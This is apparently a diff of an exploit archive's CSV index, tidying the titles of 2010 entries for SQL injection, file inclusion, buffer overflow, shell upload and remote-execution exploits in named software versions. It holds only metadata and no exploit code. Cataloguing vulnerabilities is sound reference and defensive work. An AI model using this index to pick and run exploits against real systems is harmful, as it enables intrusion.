@@ -10073,14 +10073,14 @@ id,file,description,date,author,platform,type,port 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets Blind SQL Injection Vulnerability",2010-01-01,Pyske,php,webapps,0 10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass remote sql injection",2010-01-02,R3d-D3v!L,php,webapps,0 10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial Of Services poc",2010-01-02,sarbot511,windows,dos,0 -10908,platforms/windows/dos/10908.pl,"GOM player V 2.1.9 Local crash poc",2010-01-02,SarBoT511,windows,dos,0 +10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local crash poc",2010-01-02,sarbot511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 Local Crash Poc",2010-01-02,SarBoT511,windows,dos,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability",2010-01-02,Sora,php,webapps,0 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager version:2.90.510 0day",2010-01-02,Lincoln,windows,remote,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling Vulnerability",2010-01-02,DigitALL,php,webapps,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 ""New Year Edition"" - .m3u Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0 -10923,platforms/php/webapps/10923.txt,"SuperLink Script <= 1.0 (id) SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 +10923,platforms/php/webapps/10923.txt,"superlink script <= 1.0 - (id) SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross Site Scripting Vulnerability",2010-01-02,"indoushka salah el ddine",php,webapps,0 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals LFI Vulnerability",2010-01-02,FL0RiX,php,webapps,0 10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 @@ -10108,7 +10108,7 @@ id,file,description,date,author,platform,type,port 10965,platforms/php/webapps/10965.txt,"Joomla Component com_doqment (cid) SQL Injection Vulnerability",2010-01-03,Gamoscu,php,webapps,0 10966,platforms/php/webapps/10966.txt,"Joomla Component com_otzivi Blind SQL Injection Vulnerability",2010-01-03,Cyber_945,php,webapps,0 10967,platforms/php/webapps/10967.txt,"Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerability",2010-01-03,r00t.h4x0r,php,webapps,0 -10968,platforms/php/webapps/10968.txt,"Portal ModulNet <= 1.0 (Id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0 +10968,platforms/php/webapps/10968.txt,"portal modulnet <= 1.0 - (id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0 10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3v!L,php,webapps,0 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0 @@ -10121,7 +10121,7 @@ id,file,description,date,author,platform,type,port 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3v!L,php,webapps,0 10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0 -10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 - Arabic Version File Inclusion Vulnerability",2010-01-04,"indoushka salah el ddine",php,webapps,0 +10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 Arabic Version - File Inclusion Vulnerability",2010-01-04,"indoushka salah el ddine",php,webapps,0 10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects Blind SQL Injection Vulnerability",2010-01-04,Pyske,php,webapps,0 10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,"indoushka salah el ddine",php,webapps,0 10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,"indoushka salah el ddine",multiple,webapps,0 @@ -10166,7 +10166,7 @@ id,file,description,date,author,platform,type,port 11053,platforms/windows/dos/11053.py,"ttplayer=5.6Beta3 Dos POC",2010-01-07,"t-bag YDteam",windows,dos,0 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload Vulnerability",2010-01-07,Yozgat.Us,php,webapps,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 -11060,platforms/php/webapps/11060.txt,"0day Drupal <= 6.15 Multiple Permanent XSS",2010-01-07,emgent,php,webapps,80 +11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 Multiple Permanent XSS (0day)",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability",2010-01-07,"Hussin X",php,webapps,0 11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability",2010-01-08,Red-D3v1L,php,webapps,0 @@ -10180,11 +10180,11 @@ id,file,description,date,author,platform,type,port 11076,platforms/php/webapps/11076.txt,"PPVChat Mulitiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0 11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game (game) SQL Injection Vulnerability",2010-01-10,Err0R,php,webapps,0 -11081,platforms/php/webapps/11081.txt,"TermiSBloG V 1.0 SQL Injection(s) Vulnerability",2010-01-10,Cyber_945,php,webapps,0 -11082,platforms/php/webapps/11082.txt,"PHPCalendars Multi Vulnerability",2010-01-10,LionTurk,php,webapps,0 +11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injection(s) Vulnerability",2010-01-10,Cyber_945,php,webapps,0 +11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 11083,platforms/php/webapps/11083.txt,"phpMDJ 1.0.3 SQL Injection Vulnerability",2010-01-10,"k4cp3r and Ablus",php,webapps,0 11084,platforms/windows/dos/11084.pl,"Real Player Local Crash Poc",2010-01-10,"D3V!L FUCKER",windows,dos,0 -11085,platforms/php/webapps/11085.txt,"Alex Guestbook Multi Vulnerability",2010-01-11,LionTurk,php,webapps,0 +11085,platforms/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 11086,platforms/php/webapps/11086.txt,"Joomla Component com_dashboard Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11087,platforms/php/webapps/11087.txt,"ZeeWays Script SQL Injection Vulnerability",2010-01-10,SyRiAn_34G13,php,webapps,0 11088,platforms/php/webapps/11088.txt,"Joomla Component com_jcollection Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 @@ -10192,15 +10192,15 @@ id,file,description,date,author,platform,type,port 11090,platforms/php/webapps/11090.txt,"Joomla Component com_jashowcase Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal BOF-SEH (META)",2010-01-10,FB1H2S,windows,local,0 11094,platforms/php/webapps/11094.txt,"Simply Classified 0.2 XSS & CSRF Vulnerabilities",2010-01-10,mr_me,php,webapps,0 -11095,platforms/windows/dos/11095.txt,"YPOPS! v0.9.7.3 Buffer Overflow (SEH)",2010-01-10,blake,windows,dos,0 +11095,platforms/windows/dos/11095.txt,"YPOPS! 0.9.7.3 - Buffer Overflow (SEH)",2010-01-10,Blake,windows,dos,0 11096,platforms/asp/webapps/11096.txt,"ABB 1.1 - Forum Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 11097,platforms/asp/webapps/11097.txt,"Egreetings 1.0 b - Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 11098,platforms/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 11101,platforms/hardware/webapps/11101.txt,"Multiple D-Link Routers Authentication Bypass Vulnerability",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 -11103,platforms/windows/dos/11103.html,"VLC Player v0.8.6i ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 +11103,platforms/windows/dos/11103.html,"VLC Player 0.8.6i - ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x File Upload",2010-01-11,Cyber_945,php,webapps,0 11106,platforms/multiple/dos/11106.bat,"Nuked KLan <= 1.7.7 & <= SP4 DOS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 -11107,platforms/php/webapps/11107.txt,"Gridcc Script 1.0 (SQL/XSS) Multiple Remote Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 +11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 (sql/xss) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 (PLS File) Stack Overflow (meta)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload Vulnerability",2010-01-11,R3d-D3v!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion vulnerability",2010-01-11,kaMtiEz,php,webapps,0 @@ -10223,7 +10223,7 @@ id,file,description,date,author,platform,type,port 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)",2010-01-14,Simo36,windows,remote,0 11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 .ini local stack buffer overflow poc",2010-01-14,"fl0 fl0w",windows,local,0 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager SQL Injection Vulnerability",2010-01-14,FL0RiX,php,webapps,0 -11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 +11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 11142,platforms/multiple/dos/11142.txt,"Multiple Media Player HTTP DataHandler Overflow (Itunes, Quicktime, etc)",2010-01-15,Dr_IDE,multiple,dos,0 11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - SEH Overwrite POC",2010-01-15,DarkB0x,windows,dos,0 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - SEH Overwrite Vulnerability",2010-01-15,"Mert SARICA",windows,local,0 @@ -10251,7 +10251,7 @@ id,file,description,date,author,platform,type,port 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,Jacky,windows,local,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0 11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX Remote Exec 0day POC",2010-01-17,superli,windows,remote,0 -11174,platforms/windows/local/11174.c,"VLC v0.8.6 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 +11174,platforms/windows/local/11174.c,"VLC 0.8.6 [b][c][d][a] - (.ASS file) buffer overflow exploit(win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 ActiveX Remote Exec 0day POC",2010-01-17,superli,windows,dos,0 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0 @@ -10284,7 +10284,7 @@ id,file,description,date,author,platform,type,port 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL injection Vulnerability",2010-01-21,Evil-Cod3r,php,webapps,0 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 -11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server Version <= 1.9.8/win32 CSRF Vulnerability",2010-01-21,cp77fk4r,windows,webapps,0 +11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/win32 - CSRF Vulnerability",2010-01-21,cp77fk4r,windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow Poc",2010-01-21,SkuLL-HacKeR,windows,dos,0 11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 @@ -10292,7 +10292,7 @@ id,file,description,date,author,platform,type,port 11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver SQL Injection Vulnerability",2010-01-22,B-HUNT3|2,php,webapps,0 11223,platforms/php/webapps/11223.txt,"Joomla (com_avosbillets) SQL injection Vulnerability",2010-01-22,Snakespc,php,webapps,0 -11224,platforms/php/webapps/11224.txt,"KosmosBlog v0.9.3 (SQLi/XSS/CSRF) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic",php,webapps,0 +11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQLi/XSS/CSRF) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic",php,webapps,0 11225,platforms/php/webapps/11225.txt,"Joomla Component com_gurujibook SQL injection Vulnerability",2010-01-22,Snakespc,php,webapps,0 11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL injection Vulnerability",2010-01-22,Snakespc,php,webapps,0 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 (.mp3) Local Crash PoC",2010-01-22,cr4wl3r,windows,dos,0 @@ -10319,7 +10319,7 @@ id,file,description,date,author,platform,type,port 11257,platforms/windows/remote/11257.rb,"AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)",2010-01-25,Trancer,windows,remote,0 11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 Local Crash PoC",2010-01-26,b0telh0,windows,dos,0 -11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability",2010-01-26,"indoushka salah el ddine",php,webapps,0 +11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,"indoushka salah el ddine",php,webapps,0 11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back exploit",2010-01-26,"Nikola Petrov",php,webapps,0 11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec remote files",2010-01-26,"Nikoal Petrov",php,webapps,0 11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0 @@ -10348,7 +10348,7 @@ id,file,description,date,author,platform,type,port 11292,platforms/php/webapps/11292.txt,"Joomla Component JE Event Calendar SQL Injection Vulnerability",2010-01-30,B-HUNT3|2,php,webapps,0 11293,platforms/windows/remote/11293.py,"Vermillion FTP Deamon 1.31 - Remote BOF Exploit",2010-01-30,Dz_attacker,windows,remote,0 11294,platforms/php/webapps/11294.txt,"Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 -11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version Multiple Vulnerabilities",2010-01-29,N/A,asp,webapps,0 +11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,n/a,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin (page.php) Sql Injection Vulnerability",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards > 1.1.0 - SQL Injection PoC",2010-01-30,fred777,php,webapps,0 11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 XSS and Improper Permissions",2010-01-30,h00die,php,webapps,80 @@ -10399,7 +10399,7 @@ id,file,description,date,author,platform,type,port 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability",2010-02-07,"T u R c O",php,webapps,0 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS SQL Injection Vulnerability",2010-02-07,Anonymous,php,webapps,0 -11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 +11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 11352,platforms/php/webapps/11352.txt,"Joomla Component com_productbook SQL Injection Vulnerability",2010-02-07,Snakespc,php,webapps,0 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple CSRF Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0 11354,platforms/php/webapps/11354.txt,"Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability",2010-02-07,cr4wl3r,php,webapps,0 @@ -10422,7 +10422,7 @@ id,file,description,date,author,platform,type,port 11375,platforms/php/webapps/11375.txt,"Zomorrod Cms Sql Injection Vulnerability",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script Remote File Disclosure Vulnerability",2010-02-09,jiko,php,webapps,0 11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload Vulnerability",2010-02-09,JiKo,php,webapps,0 -11378,platforms/php/webapps/11378.txt,"Newsletter Tailor v0.2.0 RFI Vulnerability",2010-02-09,Snakespc,php,webapps,0 +11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - RFI Vulnerability",2010-02-09,Snakespc,php,webapps,0 11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 11382,platforms/php/webapps/11382.txt,"eSmile Script (index.php) SQL Injection Vulnerability",2010-02-10,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -10434,7 +10434,7 @@ id,file,description,date,author,platform,type,port 11393,platforms/jsp/webapps/11393.txt,"Omnidocs SQL injection Vulnerability",2010-02-11,thebluegenius,jsp,webapps,0 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 -11396,platforms/php/webapps/11396.txt,"vBulletin v 2.3 .* SQL Injection Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 +11396,platforms/php/webapps/11396.txt,"vBulletin 2.3 .x - SQL Injection Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/webapps/11397.txt,"PHP Captcha Security Images DoS Vulnerability",2010-02-11,cp77fk4r,php,webapps,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload Vulnerability",2010-02-11,jiko,php,webapps,0 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook <= 2.0.4 Database Backup Dump Vulnerability",2010-02-11,ViRuSMaN,php,webapps,0 @@ -10457,7 +10457,7 @@ id,file,description,date,author,platform,type,port 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0 11420,platforms/windows/remote/11420.py,"Open & Compact FTPd Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow Exploit (meta)",2010-02-12,Dz_attacker,windows,remote,0 -11424,platforms/php/webapps/11424.txt,"CMS Made Simple 1.6.6 Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 +11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 11425,platforms/php/webapps/11425.txt,"daChooch Remote Sql Injection Vulnerability",2010-02-12,Snakespc,php,webapps,0 11426,platforms/multiple/dos/11426.txt,"Browser address bar characters into a small feature",2010-02-12,"Pouya Daneshmand",multiple,dos,0 11427,platforms/hardware/dos/11427.txt,"Multiple Web Browser Vulnerabilities in Nokia Symbian OS 3rd Edition",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 @@ -10465,14 +10465,14 @@ id,file,description,date,author,platform,type,port 11430,platforms/php/webapps/11430.txt,"southburn Web (products.php) Sql Injection Vulnerability",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload Remote file upload Vulnerability",2010-02-13,Phenom,php,webapps,0 11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh Kumar Mani Tripathi",windows,dos,0 -11434,platforms/php/webapps/11434.txt,"StatCounteX 3.1 Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 +11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 (orderlinks) SQL Injection Vulnerability",2010-02-13,Gamoscu,php,webapps,0 -11437,platforms/php/webapps/11437.txt,"ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities",2010-02-13,ViRuSMaN,php,webapps,0 +11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (DBD/LFI) Multiple Vulnerabilities",2010-02-13,ViRuSMaN,php,webapps,0 11438,platforms/windows/dos/11438.txt,"Internet Explorer 8 (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh Kumar Mani Tripathi",windows,dos,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 -11441,platforms/php/webapps/11441.txt,"WordPress => 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 +11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion Vulnerability",2010-02-14,eidelweiss,php,webapps,0 -11443,platforms/php/webapps/11443.txt,"Calendarix v0.8.20071118 SQL Injection",2010-02-14,Thibow,php,webapps,0 +11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS SQLi 1.2.0 (Last Version of 11/02/2010) and ALL < version",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability",2010-02-14,Lo$T,php,webapps,0 11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery Remote Sql Injection Vulnerability",2010-02-14,snakespc,php,webapps,0 @@ -10486,8 +10486,8 @@ id,file,description,date,author,platform,type,port 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0 11457,platforms/windows/remote/11457.pl,"Internet Explorer (6/7) Remote Code Execution -Remote User Add Exploit",2010-02-15,"Sioma Labs",windows,remote,0 11458,platforms/php/webapps/11458.txt,"WordPress Copperleaf Photolog SQL injection",2010-02-15,kaMtiEz,php,webapps,0 -11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (By pass) Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 -11461,platforms/php/webapps/11461.txt,"CoffieNet CMS By Pass Admin Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 +11460,platforms/php/webapps/11460.txt,"Dodo Upload 1.3 - Upload Shell (Bypass) Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 +11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 11462,platforms/php/webapps/11462.txt,"blog ink Bypass Setting Vulnerability",2010-02-15,"indoushka salah el ddine",php,webapps,0 11463,platforms/php/webapps/11463.txt,"Joomla Component com_joomportfolio Blind Injection Vulnerability",2010-02-15,Snakespc,php,webapps,0 11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare Sql Injection Vulnerability",2010-02-15,Snakespc,php,webapps,0 @@ -10540,7 +10540,7 @@ id,file,description,date,author,platform,type,port 11520,platforms/hardware/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,hardware,dos,0 11521,platforms/php/webapps/11521.txt,"Ero Auktion 2.0 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 11522,platforms/php/webapps/11522.txt,"Ero Auktion 2010 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 -11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France Multi Vulnerability",2010-02-22,"indoushka salah el ddine",php,webapps,0 +11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0 11524,platforms/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,"indoushka salah el ddine",php,webapps,0 11526,platforms/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion Vulnerability",2010-02-22,ViRuSMaN,php,webapps,0 11527,platforms/multiple/webapps/11527.html,"cPanel Multiple CSRF Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps,0 @@ -10563,10 +10563,10 @@ id,file,description,date,author,platform,type,port 11547,platforms/php/webapps/11547.txt,"Php Auktion Pro SQL (news.php) SQL Injection Vulnerability",2010-02-23,"Easy Laster",php,webapps,0 11548,platforms/php/webapps/11548.txt,"Top Auktion (news.php) SQL Injection Vulnerability",2010-02-23,"Easy Laster",php,webapps,0 11549,platforms/php/webapps/11549.pl,"Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability",2010-02-23,Snakespc,php,webapps,0 -11550,platforms/php/webapps/11550.txt,"worksimple_1.3.2 Multiple Remote Vulnerabilities",2010-02-23,JIKO,php,webapps,0 +11550,platforms/php/webapps/11550.txt,"worksimple_1.3.2 Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps,0 11551,platforms/php/webapps/11551.txt,"Softbiz Jobs Multiple SQL Injection Vulnerabilities",2010-02-23,"Easy Laster",php,webapps,0 11552,platforms/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,hardware,dos,0 -11553,platforms/php/webapps/11553.txt,"Tinypug v0.9.5 CSRF Password Change",2010-02-23,"AmnPardaz ",php,webapps,0 +11553,platforms/php/webapps/11553.txt,"Tinypug 0.9.5 - CSRF Password Change",2010-02-23,"AmnPardaz ",php,webapps,0 11554,platforms/php/webapps/11554.txt,"QuickDev 4 Php Database Disclosure Vulnerability",2010-02-23,ViRuSMaN,php,webapps,0 11555,platforms/asp/webapps/11555.txt,"bispage Bypass Vulnerability",2010-02-23,SaMir-BonD,asp,webapps,0 11556,platforms/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang Remote DoS Exploit",2010-02-23,Ale46,hardware,dos,0 @@ -10575,15 +10575,15 @@ id,file,description,date,author,platform,type,port 11559,platforms/php/webapps/11559.txt,"Article Friendly CSRF Vulnerability",2010-02-24,"Pratul Agrawal",php,webapps,0 